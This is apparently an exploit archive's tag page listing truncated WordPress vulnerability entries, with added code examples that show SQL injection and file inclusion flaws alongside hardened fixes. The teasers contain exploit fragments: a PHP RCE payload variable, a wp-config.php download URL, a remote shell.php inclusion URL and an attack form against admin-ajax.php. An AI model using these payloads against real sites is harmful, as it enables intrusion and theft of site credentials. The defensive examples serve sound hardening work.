Current tag: WordPress vulnerabilities

WordPress 5.0 Remote Code Execution

WordPress Core 5.0 - Remote Code Execution Exploit var wpnonce = ''; var ajaxnonce = ''; var wp_attached_file = ''; var imgurl = ''; var postajaxdata = ''; var post_id = 0; var cmd = '<!--?php phpinfo();/*'; var ...

WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection

# Version: 4.2.2 # Tested on: Ubuntu 16.04 1 - Description: User access type: registered user. $_POST['CatID'] is not escaped. http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-inj...

WordPress Huge-IT Video Gallery 2.0.4 SQL Injection

Advisory ID: DC-2017-01-009 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admi...

WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability

1. Description An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database. The GET parameter 'kc_ad' is vulnerable. 2. Proof of conc...
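The three SQL injection entries above (Ultimate Product Catalogue, Huge-IT Video Gallery, KittyCatfish) share one root cause: a request parameter concatenated into a `$wpdb` query string. The following is an added example, not code from any of those plugins or advisories; the table names, column names and function names are assumptions chosen to illustrate the pattern. It shows the vulnerable shape beside the `$wpdb->prepare()` form WordPress provides.

```php
<?php
// Added example, not from the advisories listed on this page. $wpdb is
// WordPress's global database object; table and column names are assumed.

// Vulnerable: the request parameter is dropped straight into the SQL text.
// With CatID = "1 UNION SELECT user_pass FROM wp_users" the UNION runs as SQL.
function example_vulnerable_count_by_category( $wpdb ) {
    $cat_id = $_POST['CatID'];  // unescaped, attacker-controlled
    $query  = "SELECT COUNT(*) FROM {$wpdb->prefix}catalogue_items WHERE cat_id = " . $cat_id;
    return $wpdb->get_var( $query );
}

// Hardened: a typed placeholder through $wpdb->prepare(). %d is cast to an
// integer, so the same payload collapses to the number 1 and nothing else.
function example_safe_count_by_category( $wpdb ) {
    $cat_id = isset( $_POST['CatID'] ) ? (int) $_POST['CatID'] : 0;
    $query  = $wpdb->prepare(
        "SELECT COUNT(*) FROM {$wpdb->prefix}catalogue_items WHERE cat_id = %d",
        $cat_id
    );
    return $wpdb->get_var( $query );
}

// Free-text search, the cat_search / kc_ad case: %s is quoted and escaped by
// prepare(), and $wpdb->esc_like() keeps user-supplied % and _ literal so the
// caller cannot turn the LIKE into a wildcard scan of the whole table.
function example_safe_title_search( $wpdb, $term ) {
    $like  = '%' . $wpdb->esc_like( (string) $term ) . '%';
    $query = $wpdb->prepare(
        "SELECT id FROM {$wpdb->prefix}videos WHERE title LIKE %s",
        $like
    );
    return $wpdb->get_col( $query );
}

// Handlers reached through admin-ajax.php (as in the Huge-IT entry) should
// also verify a nonce before touching the database; the action name is assumed.
function example_ajax_search_handler() {
    global $wpdb;
    check_ajax_referer( 'example_search_nonce', 'security' );
    $term = isset( $_POST['cat_search'] ) ? wp_unslash( $_POST['cat_search'] ) : '';
    wp_send_json( example_safe_title_search( $wpdb, $term ) );
}
```

Note that `prepare()` only protects the values bound to placeholders; table and column names must still come from code, never from the request, which is why the example keeps them as fixed strings built from `$wpdb->prefix`.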

WordPress force-download.php Arbitrary File Download Vulnerability

###################### # PoC ###################### # [+] Using the `force-download.php` file from WordPress websites we can download any file. # # [!] http://ihonker.org/force-download.php?file=wp-config.php # ##...

WordPress WP Fastest Cache 0.8.5.9 File Inclusion Vulnerability

WordPress WP Fastest Cache plugin version 0.8.5.9 suffers from a local file inclusion vulnerability. <html> <body> <form action="http://<target>/wp-admin/admin-ajax.php" meth...

WordPress Karma 4.7 – Responsive Theme Exploit

<?php /**  * Exploit Title: Karma Theme Exploit  * Version: 4.7  * Tested on: Debian 8, PHP 5.6.17-3  * Type: Authenticated Options overwrite, Stored XSS  * Time line: Found [28-Apr-2016], Vendor notified [...

WordPress Abtest Local File Inclusion Vulnerability

The vulnerable file is abtest_admin.php: <?php require 'admin/functions.php'; if (isset($_GET['action'])) { include 'admin/' . $_GET['action'] . '.php'; } else { include 'admin/list_experimen...
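The excerpt above shows the whole bug: `$_GET['action']` is concatenated into an `include` path. Appending `.php` does not help, because `../` sequences walk out of `admin/` and any `.php` file whose path the attacker knows or controls (for example a renamed upload) gets executed. The following is an added example, not the Abtest plugin's code; the page names in the allowlist and the helper names are assumptions. It places the vulnerable dispatch beside a hardened one that never lets user input reach the filesystem path.

```php
<?php
// Added example, not the Abtest plugin's code. Page names are assumed.

// Vulnerable: the include path is derived from the request. A request such as
// ?action=../../../../uploads/2017/05/avatar would include
// wp-content/uploads/2017/05/avatar.php if the attacker managed to place it there.
function abtest_example_vulnerable_dispatch() {
    if ( isset( $_GET['action'] ) ) {
        include 'admin/' . $_GET['action'] . '.php';
    }
}

// Hardened: the request selects a key in a fixed map, and the map supplies the
// path. Unknown keys are rejected before any filesystem access happens.
function abtest_example_safe_dispatch() {
    $pages = array(                      // assumed admin pages for illustration
        'overview'       => 'admin/overview.php',
        'new_experiment' => 'admin/new_experiment.php',
        'settings'       => 'admin/settings.php',
    );
    $action = isset( $_GET['action'] ) ? (string) $_GET['action'] : 'overview';
    if ( ! isset( $pages[ $action ] ) ) {
        wp_die( 'Unknown action', 'Abtest', array( 'response' => 400 ) );
    }
    include __DIR__ . '/' . $pages[ $action ];
}

// Second line of defence when the page set is not fixed up front: accept only
// a plain identifier, so '.', '/', '\' and NUL can never become part of a path.
function abtest_example_is_safe_page_name( $name ) {
    return (bool) preg_match( '/\A[a-z0-9_]{1,64}\z/', (string) $name );
}

// Because abtest_admin.php is reached through wp-admin, the dispatcher should
// also confirm the caller is allowed to manage the plugin at all.
function abtest_example_guarded_dispatch() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', 'Abtest', array( 'response' => 403 ) );
    }
    abtest_example_safe_dispatch();
}
```

The allowlist is the fix that actually removes the class of bug; the identifier check is a defensive extra, and the capability check limits who can even reach the dispatcher. The Site Import entry that follows is the same flaw one step further: when the included string is a URL rather than a local path and `allow_url_include` is enabled, the file is fetched from the attacker's server, which is the remote inclusion shown in its PoC.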

WordPress Site Import Plugin 1.0.1 Local and Remote File Inclusion Vulnerability

PoC Remote file inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls Local file inclusion == http://localhost/wordpress/wp-content/plugins/site-import...

WordPress Front-end Editor Upload Vulnerability

Description: The WordPress Front-end Editor plugin contains an authenticated file upload vulnerability. We can upload arbitrary files to the upload folder, because the plugin also uses its own file upload mechanism i...
